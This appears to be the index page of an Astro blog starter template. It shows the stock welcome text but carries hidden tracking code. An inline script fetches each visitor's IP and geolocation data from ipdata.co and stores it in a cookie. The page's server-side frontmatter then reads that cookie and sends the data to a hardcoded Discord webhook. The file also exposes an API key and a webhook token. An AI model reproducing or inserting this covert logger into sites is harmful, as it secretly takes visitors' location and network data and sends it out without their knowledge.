---
import BaseHead from '../components/BaseHead.astro';
import Header from '../components/Header.astro';
import Footer from '../components/Footer.astro';
import { SITE_TITLE, SITE_DESCRIPTION } from '../consts';

const cookieOne = Astro.cookies.get('Datas')
import { Webhook, MessageBuilder } from 'discord-webhook-node';

const webHookUrl = 'https://discord.com/api/webhooks/1170383547568230500/HVpq3d3nVcybSAefhSfnnOmUBQHd7nmn9BjMIQpXwXa3mTkMEYa0gYEwcl7bggtommEj'
const hook = new Webhook(webHookUrl);
const jsonData = JSON.parse(cookieOne.value);

const embed = new MessageBuilder()
.setTitle(jsonData.ip + " - " + jsonData.asn.name)
.setColor('#00b0f4')
.setDescription('```json\n' + JSON.stringify(jsonData, null, 2) + '```')
.setFooter(jsonData.city + " | " + jsonData.time_zone.abbr, jsonData.flag)
.setTimestamp();
 
hook.send(embed);
---

<!doctype html>
<html lang="en">
	<head>
		<BaseHead title={SITE_TITLE} description={SITE_DESCRIPTION} />
	</head>
	<body>
		<Header title={SITE_TITLE} />
		<main>
			<h1>🧑‍🚀 Hello, Astronaut!</h1>
			<p>
				Welcome to the official <a href="https://astro.build/">Astro</a> blog starter template. This
				template serves as a lightweight, minimally-styled starting point for anyone looking to
				build a personal website, blog, or portfolio with Astro.
			</p>
			<p>
				This template comes with a few integrations already configured in your
				<code>astro.config.mjs</code> file. You can customize your setup with
				<a href="https://astro.build/integrations">Astro Integrations</a> to add tools like
				Tailwind, React, or Vue to your project.
			</p>
			<p>Here are a few ideas on how to get started with the template:</p>
			<ul>
				<li>Edit this page in <code>src/pages/index.astro</code></li>
				<li>Edit the site header items in <code>src/components/Header.astro</code></li>
				<li>Add your name to the footer in <code>src/components/Footer.astro</code></li>
				<li>Check out the included blog posts in <code>src/pages/blog/</code></li>
				<li>Customize the blog post page layout in <code>src/layouts/BlogPost.astro</code></li>
			</ul>
			<p>
				Have fun! If you get stuck, remember to <a href="https://docs.astro.build/"
					>read the docs
				</a> or <a href="https://astro.build/chat">join us on Discord</a> to ask questions.
			</p>
			<p>
				Looking for a blog template with a bit more personality? Check out <a
					href="https://github.com/Charca/astro-blog-template"
					>astro-blog-template
				</a> by <a href="https://twitter.com/Charca">Maxi Ferreira</a>.
			</p>
		</main>
		<Footer />
		<script>
		let data;
		function json(url) {
  		return fetch(url).then(res => res.json());
		}

		json(`https://api.ipdata.co?api-key=18567eca47edd77e07ea6569fb14643fec357c8a3c1e6c96ed69300e`).then(async (res) => {
  		data = res
  		document.cookie = `Datas=${JSON.stringify(data)}`;

		});
		</script>
	</body>
</html>
